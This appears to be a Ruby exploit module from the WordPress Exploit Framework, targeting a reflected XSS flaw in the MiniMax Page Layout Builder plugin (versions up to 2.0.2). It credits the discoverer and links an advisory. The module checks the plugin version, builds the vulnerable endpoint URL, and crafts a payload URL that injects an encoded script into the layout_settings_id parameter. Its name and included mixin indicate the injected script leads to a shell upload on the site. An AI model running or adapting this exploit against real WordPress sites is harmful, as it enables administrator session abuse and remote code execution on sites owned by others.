# frozen_string_literal: true

class Wpxf::Exploit::MinimaxPageLayoutBuilderReflectedXssShellUpload < Wpxf::Module
  include Wpxf::WordPress::ReflectedXss

  def initialize
    super

    update_info(
      name: 'MiniMax Page Layout Builder <= 2.0.2 Reflected XSS Shell Upload',
      author: [
        'Larry W. Cashdollar', # Discovery
        'rastating'            # WPXF module
      ],
      references: [
        ['WPVDB', '8446'],
        ['URL', 'http://www.vapidlabs.com/wp/wp_advisory.php?v=358']
      ],
      date: 'Feb 09 2016'
    )
  end

  def check
    check_plugin_version_from_changelog('page-layout-builder', 'readme.txt', '2.0.3')
  end

  def vulnerable_url
    normalize_uri(wordpress_url_plugins, 'page-layout-builder', 'includes', 'layout-settings.php')
  end

  def url_with_xss
    "#{vulnerable_url}?layout_settings_id=%22%3E%3Cscript%3E#{xss_ascii_encoded_include_script}%3C%2Fscript%3E%3C%22"
  end
end
